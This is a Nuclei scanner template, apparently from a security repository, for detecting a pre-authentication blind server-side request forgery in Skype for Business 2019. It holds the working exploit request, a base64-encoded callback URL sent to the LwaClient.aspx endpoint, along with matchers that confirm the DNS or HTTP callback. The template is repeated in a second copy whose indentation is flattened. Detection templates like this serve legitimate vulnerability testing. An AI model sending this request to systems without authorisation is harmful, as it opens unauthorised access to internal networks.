hateshape/skype-blind-ssrf

## skype-blind-ssrf
id: skype-blind-ssrf

info:
  name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
  author: hateshape
  severity: high
  description: Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
  reference:
    - https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
  metadata:
    verified: true
  tags: skype,blind-ssrf

variables:
  ssrfpayload: "https://{{interactsh-url}}/?id=POC%25{1337*1337}#.xx//"

requests:
  - raw:
      - |
        GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        name: match-dns
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
      - type: word
        name: match-http
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
	id: skype-blind-ssrf

	info:
	name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
	author: hateshape
	severity: high
	description: Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
	reference:
	- https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
	metadata:
	verified: true
	tags: skype,blind-ssrf

	variables:
	ssrfpayload: "https://{{interactsh-url}}/?id=POC%25{1337*1337}#.xx//"

	requests:
	- raw:
	- \|
	GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1
	Host: {{Hostname}}

	matchers-condition: or
	matchers:
	- type: word
	name: match-dns
	part: interactsh_protocol # Confirms the DNS Interaction
	words:
	- "dns"
	- type: word
	name: match-http
	part: interactsh_protocol # Confirms the HTTP Interaction
	words:
	- "http"